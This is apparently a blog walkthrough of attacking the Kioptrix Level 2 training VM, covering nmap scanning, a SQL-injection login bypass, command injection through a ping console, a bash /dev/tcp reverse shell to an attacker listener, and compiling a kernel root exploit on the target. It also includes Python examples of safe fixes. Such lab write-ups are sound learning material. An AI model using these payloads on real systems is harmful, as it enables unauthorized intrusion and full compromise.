Summary and process of a penetration test against VulnHub Kioptrix Level 2


Host discovery

Use the netdiscover tool to discover hosts on the local network.

Netdiscover introduction: an ARP-based layer 2 host discovery tool. It has two modes, active (sending ARP requests) and passive (only listening for ARP traffic).

I use the following command:

netdiscover -i eth0

Command interpretation:

-i: network interface. Selects the interface to scan on, e.g. eth0.

Output of the tool (as shown in the figure):

192.168.1.104 is the IP of my own host, and the only unknown host is 192.168.1.101, so that is the target host IP.

Scanning / information gathering

I use nmap to scan the target host to collect more information. What the scan finds determines the directions that can be tried later, so it is always worth spending more time on information gathering.
I use the following command:

nmap -Pn -sS --stats-every 3m --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 [ip]

nmap tool explanation:

Nmap ("Network Mapper") is an open source network discovery and security auditing tool. It is designed to scan large networks quickly, though it works just as well against a single host. Nmap uses raw IP packets in novel ways to determine which hosts are on the network, which services (application name and version) those hosts offer, which operating systems (and versions) they run, what kind of packet filters or firewalls are in use, and many other characteristics. Although Nmap is usually used for security audits, many system and network administrators also use it for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Command interpretation:

-Pn: skip host discovery (no ping); treat the target as up
-sS: TCP SYN ("half-open") scan
--stats-every 3m: print a progress line every 3 minutes (m = minutes; 3s would be seconds)
--max-scan-delay 20: cap the delay Nmap adaptively inserts between probes when it detects rate limiting; note that a bare number is interpreted as seconds, so write 20ms if 20 milliseconds is meant
--defeat-rst-ratelimit: ignore the target's RST rate limiting instead of slowing down to match it; faster, but closed ports may be reported as filtered
-T4: aggressive timing template (assumes a fast, reliable network)
-p1-65535: scan all 65535 TCP ports instead of Nmap's default top 1000

The execution effect of the tool is as follows:

22: SSH remote login
80: HTTP (web server)
111: rpcbind / portmapper (Sun RPC)
443: HTTPS (web server over TLS)
631: IPP, the CUPS network printing service
792: not identified by this scan
3306: MySQL default port

Secondary scanning

Still use the nmap tool. The command is as follows:

nmap -nvv -Pn -sSV -p [port] --version-intensity 9 -A [ip]

Command interpretation:

-n: do not resolve DNS names
-vv: very verbose output
-Pn: skip host discovery (no ping)
-sSV: TCP SYN scan plus service/version detection (-sS and -sV combined)
-p: ports to scan (here, the open ports found by the first scan)
--version-intensity 9: probe intensity from 0 to 9; 9 sends every version probe to every port, slowest but most thorough
-A: aggressive mode: OS detection, version detection, default NSE script scan and traceroute
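The -p list for this second pass is simply the set of open ports from the first, full-range scan. As an added example (not from the original post), here is a small Python helper that pulls the open ports out of Nmap's greppable output (saved with -oG) and builds the targeted command above; the scan output it parses is constructed to match the port list found earlier, not the real output from the VM.

```python
import re

# Constructed sample of Nmap greppable output (-oG) for the first, full-port scan.
# It mirrors the port list found above; it is not the real output from the VM.
# A filtered port (25) is included to show that only "open" entries are kept.
SAMPLE_GNMAP = (
    "# Nmap 7.92 scan initiated as: nmap -Pn -sS -T4 -p1-65535 -oG first.gnmap 192.168.1.101\n"
    "Host: 192.168.1.101 ()\tStatus: Up\n"
    "Host: 192.168.1.101 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, "
    "111/open/tcp//rpcbind///, 443/open/tcp//https///, 631/open/tcp//ipp///, "
    "792/open/tcp/////, 3306/open/tcp//mysql///, 25/filtered/tcp//smtp///"
    "\tIgnored State: closed (65527)\n"
    "# Nmap done at ...: 1 IP address (1 host up) scanned\n"
)

# One -oG port entry is port/state/protocol/owner/service/rpcinfo/version/;
# only entries whose state is "open" are of interest for the second scan.
PORT_RE = re.compile(r"(\d+)/open/(tcp|udp)/[^/]*/([^/]*)/")


def open_ports(gnmap_text):
    """Map each host in the -oG text to a list of (port, protocol, service) that are open."""
    result = {}
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\tIgnored", 1)[0]
        for m in PORT_RE.finditer(ports_field):
            result.setdefault(host, []).append((int(m.group(1)), m.group(2), m.group(3)))
    return result


def port_argument(ports):
    """Comma-separated, sorted port list in the form nmap -p expects."""
    return ",".join(str(port) for port, _, _ in sorted(ports))


def second_scan_command(gnmap_text, host):
    """The targeted version/script scan from this section, restricted to the open ports."""
    ports = open_ports(gnmap_text).get(host, [])
    if not ports:
        raise ValueError(f"no open ports recorded for {host}")
    return (f"nmap -nvv -Pn -sSV -p {port_argument(ports)} "
            f"--version-intensity 9 -A {host}")


if __name__ == "__main__":
    print(second_scan_command(SAMPLE_GNMAP, "192.168.1.101"))
```

Run the first scan with -oG first.gnmap added, then feed the file to second_scan_command to get the exact command line for the second pass; scanning only the ports already known to be open keeps the slow version and script probes to a minimum.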

The execution effect of the tool is as follows:

I looked up public vulnerabilities for the SSH version that was detected. Unfortunately, none of them is useful here.

Let's look at port 80, open the browser and enter the ip address in the address bar

There is only a login box and no other pages.
I then ran a nikto scan with the following command:

nikto -h [ip] # -h is short for -host

Nikto is an open source (GPL) web server scanner that tests web servers for more than 3300 potentially dangerous files/CGIs, outdated versions of more than 625 servers, and more than 230 version-specific problems. Scan items and plugins can be updated automatically when needed. It is built on LibWhisker. It is a great tool, but the software itself is not updated very often, so the newest and most dangerous issues may not be detected.
As shown in the figure:

Unfortunately, there are only a few minor findings and nothing directly exploitable. Next, I use DirBuster to brute force the web server's directories and see what it turns up.
Type dirbuster in the terminal to start the tool.

DirBuster is a multithreaded Java application designed to brute force directory and file names on web and application servers.

The dictionary address is:


Start scanning

Click "Results - Tree View" to browse the findings.

Unfortunately, there are no sensitive directories. Let's take a look at the login box.

During information gathering we found that port 3306 (the MySQL default) is open, so the MySQL service is running and the login box very likely queries it. I guess there may be a SQL injection vulnerability in the login box. First, let's try whether a "universal password" (an authentication bypass payload) logs us in:

admin' OR 4=4/*
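Why that payload works, as an added example that is not part of the original walkthrough: the guess is that the login page concatenates the form fields into its SQL, so the quote closes the username string, OR 4=4 makes the WHERE clause always true, and /* comments out everything after it, including the password check. The snippet below reproduces that against an in-memory SQLite table with invented credentials (the target's real query, table and MySQL users are unknown), and shows the parameterized form that is immune to it.

```python
import sqlite3

# Constructed stand-in for the target's user table; the credentials are invented.
USERS = [("admin", "correct horse battery staple")]


def make_db():
    """Fresh in-memory database with the constructed user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_vulnerable_query(username, password):
    """The assumed bug: form fields pasted straight into the SQL string."""
    return (f"SELECT username FROM users "
            f"WHERE username='{username}' AND password='{password}'")


def vulnerable_login(username, password):
    """True when the concatenated query matches a row (the login box as the page guesses it)."""
    conn = make_db()
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def safe_login(username, password):
    """Same check with bound parameters: user input can never change the query's structure."""
    conn = make_db()
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    payload = "admin' OR 4=4/*"
    # The rest of the original WHERE clause is swallowed by the unterminated comment:
    #   ... WHERE username='admin' OR 4=4/*' AND password='anything'
    print(build_vulnerable_query(payload, "anything"))
    print("vulnerable:", vulnerable_login(payload, "anything"))   # True
    print("parameterized:", safe_login(payload, "anything"))      # False
```

Both SQLite and MySQL treat an unterminated /* as a comment that runs to the end of the statement, which is why the trailing quote and password comparison disappear; the username itself does not even have to exist, because OR 4=4 is true for every row.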

Logged in successfully. Inside there is another input box; it seems to be a web console that says it pings a host on the network. Let's try it.

I put the loopback address in the field and append a ";" (the shell command separator) followed by a command of my own, to see whether the input is passed straight to a shell.
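What is happening in that ping console, as an added example not taken from the page: the host field is dropped straight into a shell command line, so a ";" ends the ping command and whatever follows runs as a second command under the web server's account. The vulnerable handler below is a Python stand-in for the target's (unknown) server-side code, placed beside a hardened version that only accepts an IP address and passes it as its own argv element; the ping flags (-c 1 -W 1) assume a Linux iputils or BSD ping.

```python
import ipaddress
import subprocess


def vulnerable_ping(host):
    """Stand-in for the target's console: the field value is pasted into a shell command."""
    cmd = "ping -c 1 -W 1 " + host          # no validation, no quoting, shell=True
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=15)
    return proc.stdout + proc.stderr


def validate_host(host):
    """Return the canonical IP address if `host` is exactly an IPv4/IPv6 address, else None.

    Anything containing ';', '|', '`', '$(' or internal whitespace is not an address,
    so it is rejected before it can reach a shell.
    """
    try:
        return str(ipaddress.ip_address(host.strip()))
    except ValueError:
        return None


def hardened_ping(host):
    """Validate, then run ping with an argv list: no shell ever parses the address."""
    target = validate_host(host)
    if target is None:
        raise ValueError(f"refusing to ping {host!r}: not an IP address")
    proc = subprocess.run(["ping", "-c", "1", "-W", "1", target],
                          capture_output=True, text=True, timeout=15)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    # The walkthrough's trick: loopback address, a separator, then our own command.
    print(vulnerable_ping("127.0.0.1; id"))
    try:
        hardened_ping("127.0.0.1; id")
    except ValueError as e:
        print(e)
```

With the vulnerable handler, "127.0.0.1; id" prints the ping result followed by the output of id; with the hardened one the same string is rejected before anything runs. Passing an argv list without shell=True is the important part: even if validation were skipped, ";" would then just be part of an (invalid) hostname rather than a command separator.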

Once that works, the rest is much simpler: let's get a reverse shell. nc is short for NetCat, the "Swiss Army knife" of networking: a simple TCP/UDP client and server that, because of its flexibility, is widely used in intrusions and is one of the standard tools in every attacker's kit. First, back in the terminal, start netcat listening on a port:

nc -nvlp [port] # -n no DNS lookups, -v verbose, -l listen, -p local port

Then go back to the browser and append the reverse shell one-liner after the ";" in the ping field:

bash -i >& /dev/tcp/[ip]/[port] 0>&1

Here bash -i starts an interactive shell, >& /dev/tcp/[ip]/[port] sends its stdout and stderr over a TCP connection to the listener (/dev/tcp is a bash feature, not a real device file), and 0>&1 makes the shell read its stdin from that same connection.

Then click the button to run it.

The reverse shell connects back successfully.

Privilege escalation

Let's take a look at the operating system and kernel version of the target host. The commands are as follows:

cat /etc/*-release # view the operating system distribution and version
uname -mrs # view the kernel name, release and machine architecture

Search the public exploit databases for this kernel version.

Good luck! The first result is from Kali's official exploit database (Exploit-DB). Let's open it and have a look.

The target's kernel version has a public local privilege escalation exploit. We download it, start the Apache 2 service on the attacking machine, host the file there so the target can fetch it, then compile and run it on the target. The commands are as follows:

service apache2 start # start the apache2 service
cp [download directory]/9545.c /var/www/html # host the file in the web root
chmod 644 /var/www/html/9545.c # Apache only needs to read the hosted copy; 777 is more than required

Then go back to the target shell and find a directory where we have permission to download and run files; use ls -al to view the directory permissions (as shown in the figure).
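ls -al only shows whether we can write to a directory. Whether we can execute a binary there also depends on the mount: a filesystem mounted noexec (common for /tmp on hardened hosts) will refuse to run ./a.out however the permission bits are set. The helper below, an added example not from the page, reads a /proc/mounts listing and reports which of the usual drop directories allow execution; the mount table it is shown with is constructed, not the VM's, and /tmp is deliberately marked noexec in it.

```python
import os

# Constructed /proc/mounts sample (not from the Kioptrix VM). /tmp is noexec here on purpose.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw,relatime 0 0
proc /proc proc rw 0 0
tmpfs /tmp tmpfs rw,nosuid,noexec 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sda2 /home ext3 rw,noexec 0 0
"""

CANDIDATES = ("/tmp", "/var/tmp", "/dev/shm")


def parse_mounts(text):
    """Return [(mount_point, fstype, set(options)), ...] from /proc/mounts-style text."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        _device, mount_point, fstype, options = fields[:4]
        mounts.append((mount_point, fstype, set(options.split(","))))
    return mounts


def mount_for(path, mounts):
    """The mount entry holding `path`: the longest mount point that is the path or a parent of it."""
    best = None
    for entry in mounts:
        mount_point = entry[0]
        if path == mount_point or path.startswith(mount_point.rstrip("/") + "/"):
            if best is None or len(mount_point) > len(best[0]):
                best = entry
    return best


def allows_exec(path, mounts):
    """False when the filesystem holding `path` is mounted noexec (or no mount holds it)."""
    entry = mount_for(path, mounts)
    return entry is not None and "noexec" not in entry[2]


def exec_candidates(mounts_text, candidates=CANDIDATES):
    """Candidate directories from which a dropped binary can actually be executed."""
    mounts = parse_mounts(mounts_text)
    return [d for d in candidates if allows_exec(d, mounts)]


def live_exec_candidates(candidates=CANDIDATES):
    """Same check on the running host, also requiring write access (what ls -al showed)."""
    with open("/proc/mounts") as f:
        mounts = parse_mounts(f.read())
    return [d for d in candidates
            if os.path.isdir(d) and os.access(d, os.W_OK) and allows_exec(d, mounts)]


if __name__ == "__main__":
    print(exec_candidates(SAMPLE_MOUNTS))   # ['/var/tmp', '/dev/shm']
```

On the target, live_exec_candidates() (or simply cat /proc/mounts) tells you up front whether /tmp is usable or whether a writable directory on another filesystem is needed, which saves a confusing "Permission denied" from a binary whose bits look correct.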

We can see that /tmp is writable, so use cd /tmp to move there and download the file from the attacking machine. The command is as follows:


Make sure the source file is readable (gcc does not need execute permission on a .c file, and a downloaded file is normally readable already, so 777 is more than required):

chmod 644 9545.c

Compile the source file (the output defaults to a.out):

gcc 9545.c

Make sure the compiled binary is executable (gcc already sets the execute bit, so this is only a safeguard):

chmod +x a.out

Then run the compiled binary (./a.out):


Successfully obtained the root permission!


This box is also aimed at beginners: you can get root without much specialist knowledge. If you have any problems, you can send me a private message.

Tags: Linux network Information Security security Cyber Security

Posted by Isomerizer on Thu, 14 Apr 2022 02:15:22 +0930